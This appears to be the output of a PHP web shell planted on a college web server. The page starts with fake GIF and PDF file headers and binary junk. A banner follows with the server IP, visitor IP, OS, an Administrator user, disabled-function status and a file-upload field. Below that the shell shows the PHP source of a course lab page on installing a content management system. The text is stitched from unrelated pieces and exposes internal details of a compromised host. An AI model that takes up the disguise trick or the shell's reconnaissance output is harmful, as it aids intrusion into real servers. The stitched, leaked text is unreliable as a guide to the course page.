GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab07/ |
Upload File : |
<? // JimMartinson/MMDT1144/Labs/Lab07/index.phpinc $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('../../classInfo.phpinc'); $evaluationNumber = 7; $evaluationType = "Lab"; $evaluationTitle = "Contact Management Install"; if ( !isset($assignmentSuffix) ) $assignmentSuffix = ''; $evaluationName = $evaluationType.twoDigit($evaluationNumber).$assignmentSuffix; #$f_uId = formValue('uId'); if ( $f_uId ) $userId = $f_uId; #if ( !isset($userId) ) $userId = $_SESSION['userId']; #$userFileName = str_replace(array("-"," "),"",username($userId)); $title = $evaluationName.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $css .= ',colorCode.css'; include('common/pageHeader.phpinc'); $sectionTitle = $title; include('common/sectionHeader.phpinc'); include('Gradebook/EvaluationSubmission_BEGIN.phpinc'); $uploadFilename = $evaluationName.'.zip'; ?> <?=$f_message?> <a name="Lab"></a> <fieldset><legend>Description</legend> Demonstrate the ability to install a Content Management System. <span class="note">Only MySQL database support is available at this time.</span><br> <?=$gradeNote?> </fieldset> <? $ShowSpanCountBefore = false; #$ShowSpanCountBefore = true; ?> <fieldset><legend><?=$evaluationType?> Instruction</legend> <span class="bold attention">Do not perform this lab until Lab 2 has been graded.</span> <ol id="main" class="count"> <li>Create a directory called <b><?=$evaluationName?></b> in your site root. All work for this lab will be placed there.</li> <li>Install your CMS to the <?=$evaluationName?> directory and upload it to the cst.ridgewater.edu site. <br><span class="note">Only MySQL database support is available at this time.</span> </li> <li>Configure your CMS on the cst.ridgewater.edu site.<br> You will need a database and database user configured for your CMS Install. The database, database user, and passowrd is <b><?=strtolower($userFileName)?></b>. </li> <li>Turn in your assignment: <ol type="a"> <li>Ensure you have uploaded all work to your site (<a href="http://cst.ridgewater.edu<?=$courseDirectory?>FTP/<?=$userFileName?>/">http://cst.ridgewater.edu<?=$courseDirectory?>FTP/<?=$userFileName?>/</a>).</li> <li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li> </ol> </li> </ol> <?=$gradeNote?> </fieldset> <? include('Gradebook/EvaluationSubmission_END.phpinc'); $deductionPoints = $evaluationInfo['evaluationPoints'] / 10; if ( $deductionPoints == 1 ) { $deductionPoints = '1 point'; } else { $deductionPoints = $deductionPoints.' points'; } ?> <fieldset><legend>Grading Criteria</legend> Demonstrated assignment effectively: <b><?=$evaluationInfo['evaluationPoints']?></b> points. <br> There are some things I expect. If they are incorrect you will lose the following: <br> Work submitted incorrectly: -<?=$deductionPoints?>. <br> Work submitted late: -<?=$deductionPoints?> per week. <br> Re-submission of work for grading: -<?=$deductionPoints?> per submission. <br> I reserve the right <b>not</b> to apply the deduction points at my absolute discretion. </fieldset> <? include('../../ReferencesResources.phpinc'); include('common/sectionFooter.phpinc'); ?> <script src="/js/colorCode.js"></script> <? #setDebugOn(); include('common/pageFooter.phpinc'); ?>